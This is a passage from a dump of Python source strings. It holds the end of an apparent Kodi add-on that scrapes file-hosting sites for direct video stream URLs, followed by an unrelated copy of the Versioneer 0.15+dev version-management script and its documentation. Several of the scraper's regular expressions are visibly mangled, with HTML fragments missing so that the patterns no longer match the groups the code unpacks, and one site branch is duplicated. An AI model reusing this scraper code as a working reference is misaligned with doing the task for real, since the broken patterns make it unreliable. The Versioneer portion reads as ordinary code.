re.DOTALL):\n streamType,streamURL = r.groups()\n return (streamURL + \'|\' + self.getHeadersEncoded(url), fname)\n for r in re.finditer(\'\\([^\\<]+)\\<\\/td\\>\' ,response_data, re.DOTALL):\n deliminator,fileName = r.groups()\n for r in re.finditer(\'(\\|)([^\\|]{42})\\|\' ,response_data, re.DOTALL):\n deliminator,fileID = r.groups()\n streamURL = \'http://cloud1.hcbit.com/cgi-bin/dl.cgi/\'+fileID+\'/\'+fileName\n return (streamURL + \'|\' + self.getHeadersEncoded(url), fname)\n\n if self.domain == \'bestreams.net\':\n\n file_id = \'\'\n aff = \'\'\n variable = \'file_id\'\n for r in re.finditer(\'\\\'\'+variable+\'\\\', (\\\')([^\\\']*)\\\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n file_id = value\n\n variable = \'aff\'\n for r in re.finditer(\'\\\'\'+variable+\'\\\', (\\\')([^\\\']*)\\\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n aff = value\n\n xbmc.sleep((int(2)+1)*1000)\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))\n opener.addheaders = [ (\'User-Agent\' , self.user_agent), (\'Referer\', url), (\'Cookie\', \'lang=1; file_id=\'+file_id+\'; aff=\'+aff+\';\')]\n\n elif self.domain == \'thevideo.me\':\n\n for r in re.finditer(\'\\,\\s+\\\'file\\\'\\s+\\:\\s+\\\'([^\\\']+)\\\'\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n return (streamURL,fname)\n\n elif self.domain == \'vidzi.tv\':\n\n for r in re.finditer(\'\\s+file:\\s+\\""([^\\""]+)\\""\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n return (streamURL,fname)\n\n # if action fails, validate login\n try:\n# response = urllib2.urlopen(req)\n response = opener.open(req, urllib.urlencode(values))\n\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n try:\n response = opener.open(req, urllib.urlencode(values))\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\',\'\')\n else:\n log(str(e), True)\n return (\'\',\'\')\n\n response_data = response.read()\n response.close()\n\n op=\'\'\n for r in re.finditer(\'.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,id,rand,referer,submit = r.groups()\n values = {\n \'op\' : op,\n \'id\' : id,\n \'rand\' : rand,\n \'referer\' : referer,\n \'method_free\' : submit,\n \'download_direct\' : 1\n\n }\n\n streamURL=\'\'\n\n title = \'\'\n for r in re.finditer(\'\\<(title)\\>([^\\>]*)\\<\\/title\\>\' ,response_data, re.DOTALL):\n titleID,title = r.groups()\n\n\n # for thefile\n if self.domain == \'thefile.me\':\n\n downloadAddress = \'\'\n for r in re.finditer(\'\\<(img) src\\=\\""http\\:\\/\\/([^\\/]+)\\/[^\\""]+\\"" style\' ,response_data, re.DOTALL):\n downloadTag,downloadAddress = r.groups()\n\n for r in re.finditer(\'(\\|)([^\\|]{56})\\|\' ,response_data, re.DOTALL):\n deliminator,fileID = r.groups()\n streamURL = \'http://\'+str(downloadAddress)+\'/d/\'+fileID+\'/video.mp4\'\n\n elif self.domain == \'sharerepo.com\':\n for r in re.finditer(\'(file)\\: \\\'([^\\\']+)\\\'\\,\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n for r in re.finditer(\'(\\|)([^\\|]{60})\\|\' ,response_data, re.DOTALL):\n deliminator,fileID = r.groups()\n streamURL = \'http://37.48.80.43/d/\'+fileID+\'/video.mp4?start=0\'\n\n elif self.domain == \'filenuke.com\':\n for r in re.finditer(\'(\\|)([^\\|]{56})\\|\' ,response_data, re.DOTALL):\n deliminator,fileID = r.groups()\n streamURL = \'http://37.252.3.244/d/\'+fileID+\'/video.flv?start=0\'\n elif self.domain == \'sharerepo.com\':\n for r in re.finditer(\'(file)\\: \\\'([^\\\']+)\\\'\\,\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n elif self.domain == \'letwatch.us\':\n\n for r in re.finditer(\'\\[IMG\\]http://([^\\/]+)\\/\',\n response_data, re.DOTALL):\n IP = r.group(1)\n\n for r in re.finditer(\'\\|([^\\|]{60})\\|\',\n response_data, re.DOTALL):\n fileID = r.group(1)\n streamURL = \'http://\'+IP+\'/\'+fileID+\'/v.flv\'\n\n elif self.domain == \'thevideo.me\':\n\n for r in re.finditer(\'\\,\\s+\\\'file\\\'\\s+\\:\\s+\\\'([^\\\']+)\\\'\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n\n elif self.domain == \'vidto.me\':\n\n for r in re.finditer(\'var file_link = \\\'([^\\\']+)\\\'\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n\n elif self.domain == \'allmyvideos.net\':\n\n for r in re.finditer(\'\\""file\\"" : \\""([^\\""]+)\\""\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n\n elif self.domain == \'realvid.net\':\n\n for r in re.finditer(\'file:\\s?\\\'([^\\\']+)\\\'\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n\n elif self.domain == \'uptobox.com\' or self.domain == \'uptostream.com\':\n\n for r in re.finditer(\'\\\\s+\\\',\n response_data, re.DOTALL):\n streamURL = r.group(1)\n return (streamURL, fname)\n\n for r in re.finditer(\'\\(\\d+) seconds\' ,response_data, re.DOTALL):\n id,timeout = r.groups()\n\n for r in re.finditer(\'

    (.*?)\' ,response_data, re.DOTALL):\n id,error = r.groups()\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), error)\n return (\'\',\'\')\n\n\n\n\n req = urllib2.Request(url)\n\n if timeout > 0:\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(timeout))\n\n xbmc.sleep((int(timeout)+1)*1000)\n\n # if action fails, validate login\n try:\n response = opener.open(req, urllib.urlencode(values))\n\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n try:\n response = opener.open(req, urllib.urlencode(values))\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\',\'\')\n else:\n log(str(e), True)\n return (\'\',\'\')\n\n response_data = response.read()\n response.close()\n\n for r in re.finditer(\'(Click here to start your download)\' ,response_data, re.DOTALL):\n streamURL,downloadlink = r.groups()\n\n #vodlocker.com\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'(file)\\: \\""([^\\""]+)""\\,\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n if \'mp4\' in streamURL:\n break\n\n # mightyupload.com\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'var (file_link) = \\\'([^\\\']+)\\\'\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n # vidhog.com\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'(product_download_url)=([^\\\']+)\\\'\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n # vidspot.net\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'""(file)"" : ""([^\\""]+)""\\,\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n\n # uploadc.com\n if streamURL == \'\':\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'\\\'(file)\\\',\\\'([^\\\']+)\\\'\\)\\;\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n streamURL = streamURL + \'|\' + self.getHeadersEncoded(url)\n\n# return \'http://93.120.27.PI:KEY.mp4\'\n\n\n return (streamURL, fname)\n\nclass MyHTTPErrorProcessor(urllib2.HTTPErrorProcessor):\n\n def http_response(self, request, response):\n code, msg, hdrs = response.code, response.msg, response.info()\n\n # only add this line to stop 302 redirection.\n if code == 302: return response\n\n if not (200 <= code < 300):\n response = self.parent.error(\n \'http\', request, response, code, msg, hdrs)\n return response\n\n https_response = http_response\n\n\n', '\n# Version: 0.15+dev\n\n""""""The Versioneer - like a rocketeer, but for versions.\n\nThe Versioneer\n==============\n\n* like a rocketeer, but for versions!\n* https://github.com/warner/python-versioneer\n* Brian Warner\n* License: Public Domain\n* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy\n* [![Latest Version]\n(https://pypip.in/version/versioneer/badge.svg?style=flat)\n](https://pypi.python.org/pypi/versioneer/)\n* [![Build Status]\n(https://travis-ci.org/warner/python-versioneer.png?branch=master)\n](https://travis-ci.org/warner/python-versioneer)\n\nThis is a tool for managing a recorded version number in distutils-based\npython projects. The goal is to remove the tedious and error-prone ""update\nthe embedded version string"" step from your release process. Making a new\nrelease should be as easy as recording a new tag in your version-control\nsystem, and maybe making new tarballs.\n\n\n## Quick Install\n\n* `pip install versioneer` to somewhere to your $PATH\n* add a `[versioneer]` section to your setup.cfg (see below)\n* run `versioneer install` in your source tree, commit the results\n\n## Version Identifiers\n\nSource trees come from a variety of places:\n\n* a version-control system checkout (mostly used by developers)\n* a nightly tarball, produced by build automation\n* a snapshot tarball, produced by a web-based VCS browser, like github\'s\n ""tarball from tag"" feature\n* a release tarball, produced by ""setup.py sdist"", distributed through PyPI\n\nWithin each source tree, the version identifier (either a string or a number,\nthis tool is format-agnostic) can come from a variety of places:\n\n* ask the VCS tool itself, e.g. ""git describe"" (for checkouts), which knows\n about recent ""tags"" and an absolute revision-id\n* the name of the directory into which the tarball was unpacked\n* an expanded VCS keyword ($Id$, etc)\n* a `_version.py` created by some earlier build step\n\nFor released software, the version identifier is closely related to a VCS\ntag. Some projects use tag names that include more than just the version\nstring (e.g. ""myproject-1.2"" instead of just ""1.2""), in which case the tool\nneeds to strip the tag prefix to extract the version identifier. For\nunreleased software (between tags), the version identifier should provide\nenough information to help developers recreate the same tree, while also\ngiving them an idea of roughly how old the tree is (after version 1.2, before\nversion 1.3). Many VCS systems can report a description that captures this,\nfor example `git describe --tags --dirty --always` reports things like\n""0.7-1-g574ab98-dirty"" to indicate that the checkout is one revision past the\n0.7 tag, has a unique revision id of ""574ab98"", and is ""dirty"" (it has\nuncommitted changes.\n\nThe version identifier is used for multiple purposes:\n\n* to allow the module to self-identify its version: `myproject.__version__`\n* to choose a name and prefix for a \'setup.py sdist\' tarball\n\n## Theory of Operation\n\nVersioneer works by adding a special `_version.py` file into your source\ntree, where your `__init__.py` can import it. This `_version.py` knows how to\ndynamically ask the VCS tool for version information at import time.\n\n`_version.py` also contains `$Revision$` markers, and the installation\nprocess marks `_version.py` to have this marker rewritten with a tag name\nduring the `git archive` command. As a result, generated tarballs will\ncontain enough information to get the proper version.\n\nTo allow `setup.py` to compute a version too, a `versioneer.py` is added to\nthe top level of your source tree, next to `setup.py` and the `setup.cfg`\nthat configures it. This overrides several distutils/setuptools commands to\ncompute the version when invoked, and changes `setup.py build` and `setup.py\nsdist` to replace `_version.py` with a small static file that contains just\nthe generated version data.\n\n## Installation\n\nFirst, decide on values for the following configuration variables:\n\n* `VCS`: the version control system you use. Currently accepts ""git"".\n\n* `style`: the style of version string to be produced. See ""Styles"" below for\n details. Defaults to ""pep440"", which looks like\n `TAG[+DISTANCE.gSHORTHASH[.dirty]]`.\n\n* `versionfile_source`:\n\n A project-relative pathname into which the generated version strings should\n be written. This is usually a `_version.py` next to your project\'s main\n `__init__.py` file, so it can be imported at runtime. If your project uses\n `src/myproject/__init__.py`, this should be `src/myproject/_version.py`.\n This file should be checked in to your VCS as usual: the copy created below\n by `setup.py setup_versioneer` will include code that parses expanded VCS\n keywords in generated tarballs. The \'build\' and \'sdist\' commands will\n replace it with a copy that has just the calculated version string.\n\n This must be set even if your project does not have any modules (and will\n therefore never import `_version.py`), since ""setup.py sdist"" -based trees\n still need somewhere to record the pre-calculated version strings. Anywhere\n in the source tree should do. If there is a `__init__.py` next to your\n `_version.py`, the `setup.py setup_versioneer` command (described below)\n will append some `__version__`-setting assignments, if they aren\'t already\n present.\n\n* `versionfile_build`:\n\n Like `versionfile_source`, but relative to the build directory instead of\n the source directory. These will differ when your setup.py uses\n \'package_dir=\'. If you have `package_dir={\'myproject\': \'src/myproject\'}`,\n then you will probably have `versionfile_build=\'myproject/_version.py\'` and\n `versionfile_source=\'src/myproject/_version.py\'`.\n\n If this is set to None, then `setup.py build` will not attempt to rewrite\n any `_version.py` in the built tree. If your project does not have any\n libraries (e.g. if it only builds a script), then you should use\n `versionfile_build = None`. To actually use the computed version string,\n your `setup.py` will need to override `distutils.command.build_scripts`\n with a subclass that explicitly inserts a copy of\n `versioneer.get_version()` into your script file. See\n `test/demoapp-script-only/setup.py` for an example.\n\n* `tag_prefix`:\n\n a string, like \'PROJECTNAME-\', which appears at the start of all VCS tags.\n If your tags look like \'myproject-1.2.0\', then you should use\n tag_prefix=\'myproject-\'. If you use unprefixed tags like \'1.2.0\', this\n should be an empty string, using either `tag_prefix=` or `tag_prefix=\'\'`.\n\n* `parentdir_prefix`:\n\n a optional string, frequently the same as tag_prefix, which appears at the\n start of all unpacked tarball filenames. If your tarball unpacks into\n \'myproject-1.2.0\', this should be \'myproject-\'. To disable this feature,\n just omit the field from your `setup.cfg`.\n\nThis tool provides one script, named `versioneer`. That script has one mode,\n""install"", which writes a copy of `versioneer.py` into the current directory\nand runs `versioneer.py setup` to finish the installation.\n\nTo versioneer-enable your project:\n\n* 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and\n populating it with the configuration values you decided earlier (note that\n the option names are not case-sensitive):\n\n ````\n [versioneer]\n VCS = git\n style = pep440\n versionfile_source = src/myproject/_version.py\n versionfile_build = myproject/_version.py\n tag_prefix =\n parentdir_prefix = myproject-\n ````\n\n* 2: Run `versioneer install`. This will do the following:\n\n * copy `versioneer.py` into the top of your source tree\n * create `_version.py` in the right place (`versionfile_source`)\n * modify your `__init__.py` (if one exists next to `_version.py`) to define\n `__version__` (by calling a function from `_version.py`)\n * modify your `MANIFEST.in` to include both `versioneer.py` and the\n generated `_version.py` in sdist tarballs\n\n `versioneer install` will complain about any problems it finds with your\n `setup.py` or `setup.cfg`. Run it multiple times until you have fixed all\n the problems.\n\n* 3: add a `import versioneer` to your setup.py, and add the following\n arguments to the setup() call:\n\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n\n* 4: commit these changes to your VCS. To make sure you won\'t forget,\n `versioneer install` will mark everything it touched for addition using\n `git add`. Don\'t forget to add `setup.py` and `setup.cfg` too.\n\n## Post-Installation Usage\n\nOnce established, all uses of your tree from a VCS checkout should get the\ncurrent version string. All generated tarballs should include an embedded\nversion string (so users who unpack them will not need a VCS tool installed).\n\nIf you distribute your project through PyPI, then the release process should\nboil down to two steps:\n\n* 1: git tag 1.0\n* 2: python setup.py register sdist upload\n\nIf you distribute it through github (i.e. users use github to generate\ntarballs with `git archive`), the process is:\n\n* 1: git tag 1.0\n* 2: git push; git push --tags\n\nVersioneer will report ""0+untagged.NUMCOMMITS.gHASH"" until your tree has at\nleast one tag in its history.\n\n## Version-String Flavors\n\nCode which uses Versioneer can learn about its version string at runtime by\nimporting `_version` from your main `__init__.py` file and running the\n`get_versions()` function. From the ""outside"" (e.g. in `setup.py`), you can\nimport the top-level `versioneer.py` and run `get_versions()`.\n\nBoth functions return a dictionary with different flavors of version\ninformation:\n\n* `[\'version\']`: A condensed version string, rendered using the selected\n style. This is the most commonly used value for the project\'s version\n string. The default ""pep440"" style yields strings like `0.11`,\n `0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the ""Styles"" section\n below for alternative styles.\n\n* `[\'full-revisionid\']`: detailed revision identifier. For Git, this is the\n full SHA1 commit id, e.g. ""PI:KEY"".\n\n* `[\'dirty\']`: a boolean, True if the tree has uncommitted changes. Note that\n this is only accurate if run in a VCS checkout, otherwise it is likely to\n be False or None\n\n* `[\'error\']`: if the version string could not be computed, this will be set\n to a string describing the problem, otherwise it will be None. It may be\n useful to throw an exception in setup.py if this is set, to avoid e.g.\n creating tarballs with a version string of ""unknown"".\n\nSome variants are more useful than others. Including `full-revisionid` in a\nbug report should allow developers to reconstruct the exact code being tested\n(or indicate the presence of local changes that should be shared with the\ndevelopers). `version` is suitable for display in an ""about"" box or a CLI\n`--version` output: it can be easily compared against release notes and lists\nof bugs fixed in various releases.\n\nThe installer adds the following text to your `__init__.py` to place a basic\nversion in `YOURPROJECT.__version__`:\n\n from ._version import get_versions\n __version__ = get_versions()[\'version\']\n del get_versions\n\n## Styles\n\nThe setup.cfg `style=` configuration controls how the VCS information is\nrendered into a version string.\n\nThe default style, ""pep440"", produces a PEP440-compliant string, equal to the\nun-prefixed tag name for actual releases, and containing an additional ""local\nversion"" section with more detail for in-between builds. For Git, this is\nTAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags\n--dirty --always`. For example ""0.11+2.g1076c97.dirty"" indicates that the\ntree is like the ""1076c97"" commit but has uncommitted changes ("".dirty""), and\nthat this commit is two revisions (""+2"") beyond the ""0.11"" tag. For released\nsoftware (exactly equal to a known tag), the identifier will only contain the\nstripped tag, e.g. ""0.11"".\n\nOther styles are available. See details.md in the Versioneer source tree for\ndescriptions.\n\n## Debugging\n\nVersioneer tries to avoid fatal errors: if something goes wrong, it will tend\nto return a version of ""0+unknown"". To investigate the problem, run `setup.py\nversion`, which will run the version-lookup code in a verbose mode, and will\ndisplay the full contents of `get_versions()` (including the `error` string,\nwhich may help identify what went wrong).\n\n## Updating Versioneer\n\nTo upgrade your project to a new release of Versioneer, do the following:\n\n* install the new Versioneer (`pip install -U versioneer` or equivalent)\n* edit `setup.cfg`, if necessary, to include any new configuration settings\n indicated by the release notes\n* re-run `versioneer install` in your source tree, to replace\n `SRC/_version.py`\n* commit any changed files\n\n### Upgrading to 0.15\n\nStarting with this version, Versioneer is configured with a `[versioneer]`\nsection in your `setup.cfg` file. Earlier versions required the `setup.py` to\nset attributes on the `versioneer` module immediately after import. The new\nversion will refuse to run (raising an exception during import) until you\nhave provided the necessary `setup.cfg` section.\n\nIn addition, the Versioneer package provides an executable named\n`versioneer`, and the installation process is driven by running `versioneer\ninstall`. In 0.14 and earlier, the executable was named\n`versioneer-installer` and was run without an argument.\n\n### Upgrading to 0.14\n\n0.14 changes the format of the version string. 0.13 and earlier used\nhyphen-separated strings like ""0.11-2-g1076c97-dirty"". 0.14 and beyond use a\nplus-separated ""local version"" section strings, with dot-separated\ncomponents, like ""0.11+2.g1076c97"". PEP440-strict tools did not like the old\nformat, but should be ok with the new one.\n\n### Upgrading from 0.11 to 0.12\n\nNothing special.\n\n### Upgrading from 0.10 to 0.11\n\nYou must add a `versioneer.VCS = ""git""` to your `setup.py` before re-running\n`setup.py setup_versioneer`. This will enable the use of additional\nversion-control systems (SVN, etc) in the future.\n\n## Future Directions\n\nThis tool is designed to make it easily extended to other version-control\nsystems: all VCS-specific components are in separate directories like\nsrc/git/ . The top-level `versioneer.py` script is assembled from these\ncomponents by running make-versioneer.py . In the future, make-versioneer.py\nwill take a VCS name as an argument, and will construct a version of\n`versioneer.py` that is specific to the given VCS. It might also take the\nconfiguration arguments that are currently provided manually during\ninstallation by editing setup.py . Alternatively, it might go the other\ndirection and include code from all supported VCS systems, reducing the\nnumber of intermediate scripts.\n\n\n## License\n\nTo make Versioneer easier to embed, all its code is dedicated to the public\ndomain. The `_version.py` that it creates is also in the public domain.\nSpecifically, both are released under the Creative Commons ""Public Domain\nDedication"" license (CC0-1.0), as described in\nhttps://creativecommons.org/publicdomain/zero/1.0/ .\n\n""""""\n\nfrom __future__ import print_function\ntry:\n import configparser\nexcept ImportError:\n import ConfigParser as configparser\nimport errno\nimport json\nimport os\nimport re\nimport subprocess\nimport sys\n\n\nclass VersioneerConfig:\n\n """"""Container for Versioneer configuration parameters.""""""\n\n\ndef get_root():\n """"""Get the project root directory.\n\n We require that all commands are run from the project root, i.e. the\n directory that contains setup.py, setup.cfg, and versioneer.py .\n """"""\n root = os.path.realpath(os.path.abspath(os.getcwd()))\n setup_py = os.path.join(root, ""setup.py"")\n versioneer_py = os.path.join(root, ""versioneer.py"")\n if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):\n # allow \'python path/to/setup.py COMMAND\'\n root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))\n setup_py = os.path.join(root, ""setup.py"")\n versioneer_py = os.path.join(root, ""versioneer.py"")\n if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):\n err = (""Versioneer was unable to run the project root directory. ""\n ""Versioneer requires setup.py to be executed from ""\n ""its immediate directory (like \'python setup.py COMMAND\'), ""\n ""or in a way that lets it use sys.argv[0] to find the root ""\n ""(like \'python path/to/setup.py COMMAND\')."")\n raise VersioneerBadRootError(err)\n try:\n # Certain runtime workflows (setup.py install/develop in a setuptools\n # tree) execute all dependencies in a single python process, so\n # ""versioneer"" may be imported multiple times, and python\'s shared\n # module-import table will cache the first one. So we can\'t use\n # os.path.dirname(__file__), as that will find whichever\n # versioneer.py was first imported, even in later projects.\n me = os.path.realpath(os.path.abspath(__file__))\n if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]:\n print(""Warning: build in %s is using versioneer.py from %s""\n % (os.path.dirname(me), versioneer_py))\n except NameError:\n pass\n return root\n\n\ndef get_config_from_root(root):\n """"""Read the project setup.cfg file to determine Versioneer config.""""""\n # This might raise EnvironmentError (if setup.cfg is missing), or\n # configparser.NoSectionError (if it lacks a [versioneer] section), or\n # configparser.NoOptionError (if it lacks ""VCS=""). See the docstring at\n # the top of versioneer.py for instructions on writing your setup.cfg .\n setup_cfg = os.path.join(root, ""setup.cfg"")\n parser = configparser.SafeConfigParser()\n with open(setup_cfg, ""r"") as f:\n parser.readfp(f)\n VCS = parser.get(""versioneer"", ""VCS"") # mandatory\n\n def get(parser, name):\n if parser.has_option(""versioneer"", name):\n return parser.get(""versioneer"", name)\n return None\n cfg = VersioneerConfig()\n cfg.VCS = VCS\n cfg.style = get(parser, ""style"") or """"\n cfg.versionfile_source = get(parser, ""versionfile_source"")\n cfg.versionfile_build = get(parser, ""versionfile_build"")\n cfg.tag_prefix = get(parser, ""tag_prefix"")\n if cfg.tag_prefix in (""\'\'"", \'""""\'):\n cfg.tag_prefix = """"\n cfg.parentdir_prefix = get(parser, ""parentdir_prefix"")\n cfg.verbose = get(parser, ""verbose"")\n return cfg\n\n\nclass NotThisMethod(Exception):\n\n """"""Exception raised if a method is not valid for the current scenario.""""""\n\n# these dictionaries contain VCS-specific tools\nLONG_VERSION_PY = {}\nHANDLERS = {}\n\n\ndef register_vcs_handler(vcs, method): # decorator\n """"""Decorator to mark a method as the handler for a particular VCS.""""""\n def decorate(f):\n """"""Store f in HANDLERS[vcs][method].""""""\n if vcs not in HANDLERS:\n HANDLERS[vcs] = {}\n HANDLERS[vcs][method] = f\n return f\n return decorate\n\n\ndef run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):\n """"""Call the given command(s).""""""\n assert isinstance(commands, list)\n p = None\n for c in commands:\n try:\n dispcmd = str([c] + args)\n # remember shell=False, so use git.cmd on windows, not just git\n p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,\n stderr=(subprocess.PIPE if hide_stderr\n else None))\n break\n except EnvironmentError:\n e = sys.exc_info()[1]\n if e.errno == errno.ENOENT:\n continue\n if verbose:\n print(""unable to run %s"" % dispcmd)\n print(e)\n return None\n else:\n if verbose:\n print(""unable to find command, tried %s"" % (commands,))\n return None\n stdout = p.communicate()[0].strip()\n if sys.version_info[0] >= 3:\n stdout = stdout.decode()\n if p.returncode != 0:\n if verbose:\n print(""unable to run %s (error)"" % dispcmd)\n return None\n return stdout\nLONG_VERSION_PY[\'git\'] = r\'\'\'\n# This file helps to compute a version number in source trees obtained from\n# git-archive tarball (such as those provided by githubs download-from-tag\n# feature). Distribution tarballs (built by setup.py sdist) and build\n# directories (produced by setup.py build) will contain a much shorter file\n# that just contains the computed version number.\n\n# This file is released into the public domain. Generated by\n# versioneer-0.15+dev (https://github.com/warner/python-versioneer)\n\n""""""Git implementation of _version.py.""""""\n\nimport errno\nimport os\nimport re\nimport subprocess\nimport sys\n\n\ndef get_keywords():\n """"""Get the keywords needed to look up the version information.""""""\n # these strings will be replaced by git during git-archive.\n # setup.py/versioneer.py will grep for the variable names, so they must\n # each be defined on a line of their own. _version.py will just call\n # get_keywords().\n git_refnames = ""%(DOLLAR)sFormat:%%d%(DOLLAR)s""\n git_full = ""%(DOLLAR)sFormat:%%H%(DOLLAR)s""\n keywords = {""refnames"": git_refnames, ""full"": git_full}\n return keywords\n\n\nclass VersioneerConfig:\n\n """"""Container for Versioneer configuration parameters.""""""\n\n\ndef get_config():\n """"""Create, populate and return the VersioneerConfig() object.""""""\n # these strings are filled in when \'setup.py versioneer\' creates\n # _version.py\n cfg = VersioneerConfig()\n cfg.VCS = ""git""\n cfg.style = ""%(STYLE)s""\n cfg.tag_prefix = ""%(TAG_PREFIX)s""\n cfg.parentdir_prefix = ""%(PARENTDIR_PREFIX)s""\n cfg.versionfile_source = ""%(VERSIONFILE_SOURCE)s""\n cfg.verbose = False\n return cfg\n\n\nclass NotThisMethod(Exception):\n\n """"""Exception raised if a method is not valid for the current scenario.""""""\n\n\nLONG_VERSION_PY = {}\nHANDLERS = {}\n\n\ndef register_vcs_handler(vcs, method): # decorator\n """"""Decorator to mark a method as the handler for a particular VCS.""""""\n def decorate(f):\n """"""Store f in HANDLERS[vcs][method].""""""\n if vcs not in HANDLERS:\n HANDLERS[vcs] = {}\n HANDLERS[vcs][method] = f\n return f\n return decorate\n\n\ndef run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):\n """"""Call the given command(s).""""""\n assert isinstance(commands, list)\n p = None\n for c in commands:\n try:\n dispcmd = str([c] + args)\n # remember shell=False, so use git.cmd on windows, not just git\n p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,\n stderr=(subprocess.PIPE if hide_stderr\n else None))\n break\n except EnvironmentError:\n e = sys.exc_info()[1]\n if e.errno == errno.ENOENT:\n continue\n if verbose:\n print(""unable to run %%s"" %% dispcmd)\n print(e)\n return None\n else:\n if verbose:\n print(""unable to find command, tried %%s"" %% (commands,))\n return None\n stdout = p.communicate()[0].strip()\n if sys.version_info[0] >= 3:\n stdout = stdout.decode()\n if p.returncode != 0:\n if verbose:\n print(""unable to run %%s (error)"" %% dispcmd)\n return None\n return stdout\n\n\ndef versions_from_parentdir(parentdir_prefix, root, verbose):\n """"""Try to determine the version from the parent directory name.\n\n Source tarballs conventionally unpack into a directory that includes\n both the project name and a version string.\n """"""\n dirname = os.path.basename(root)\n if not dirname.startswith(parentdir_prefix):\n if verbose:\n print(""guessing rootdir is \'%%s\', but \'%%s\' doesn\'t start with ""\n ""prefix \'%%s\'"" %% (root, dirname, parentdir_prefix))\n raise NotThisMethod(""rootdir doesn\'t start with parentdir_prefix"")\n return {""version"": dirname[len(parentdir_prefix):],\n ""full-revisionid"": None,\n ""dirty"": False, ""error"": None}\n\n\n@register_vcs_handler(""git"", ""get_keywords"")\ndef git_get_keywords(versionfile_abs):\n """"""Extract version information from the given file.""""""\n # the code embedded in _version.py can just fetch the value of these\n # keywords. When used from setup.py, we don\'t want to import _version.py,\n # so we do it with a regexp instead. This function is not used from\n # _version.py.\n keywords = {}\n try:\n f = open(versionfile_abs, ""r"")\n for line in f.readlines():\n if line.strip().startswith(""git_refnames =""):\n mo = re.search(r\'=\\s*""(.*)""\', line)\n if mo:\n keywords[""refnames""] = mo.group(1)\n if line.strip().startswith(""git_full =""):\n mo = re.search(r\'=\\s*""(.*)""\', line)\n if mo:\n keywords[""full""] = mo.group(1)\n f.close()\n except EnvironmentError:\n pass\n return keywords\n\n\n@register_vcs_handler(""git"", ""keywords"")\ndef git_versions_from_keywords(keywords, tag_prefix, verbose):\n """"""Get version information from git keywords.""""""\n if not keywords:\n raise NotThisMethod(""no keywords at all, weird"")\n refnames = keywords[""refnames""].strip()\n if refnames.startswith(""$Format""):\n if verbose:\n print(""keywords are unexpanded, not using"")\n raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"")\n refs = [r.strip() for r in refnames.strip(""()"").split("","")]\n # starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of\n # just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those.\n TAG = ""tag: ""\n tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])\n if not tags:\n # Either we\'re using git < 1.8.3, or there really are no tags. We use\n # a heuristic: assume all version tags have a digit. The old git %%d\n # expansion behaves like git log --decorate=short and strips out the\n # refs/heads/ and refs/tags/ prefixes that would let us distinguish\n # between branches and tags. By ignoring refnames without digits, we\n # filter out many common branch names like ""release"" and\n # ""stabilization"", as well as ""HEAD"" and ""master"".\n tags = set([r for r in refs if re.search(r\'\\d\', r)])\n if verbose:\n print(""discarding \'%%s\', no digits"" %% "","".join(set(refs) - tags))\n if verbose:\n print(""likely tags: %%s"" %% "","".join(sorted(tags)))\n for ref in sorted(tags):\n # sorting will prefer e.g. ""2.0"" over ""2.0rc1""\n if ref.startswith(tag_prefix):\n r = ref[len(tag_prefix):]\n if verbose:\n print(""picking %%s"" %% r)\n return {""version"": r,\n ""full-revisionid"": keywords[""full""].strip(),\n ""dirty"": False, ""error"": None, ""branch"": None\n }\n # no suitable tags, so version is ""0+unknown"", but full hex is still there\n if verbose:\n print(""no suitable tags, using unknown + full revision id"")\n return {""version"": ""0+unknown"",\n ""full-revisionid"": keywords[""full""].strip(),\n ""dirty"": False, ""error"": ""no suitable tags"",\n ""branch"": None}\n\n\n@register_vcs_handler(""git"", ""pieces_from_vcs"")\ndef git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):\n """"""Get version from \'git describe\' in the root of the source tree.\n\n This only gets called if the git-archive \'subst\' keywords were *not*\n expanded, and _version.py hasn\'t already been rewritten with a short\n version string, meaning we\'re inside a checked out source 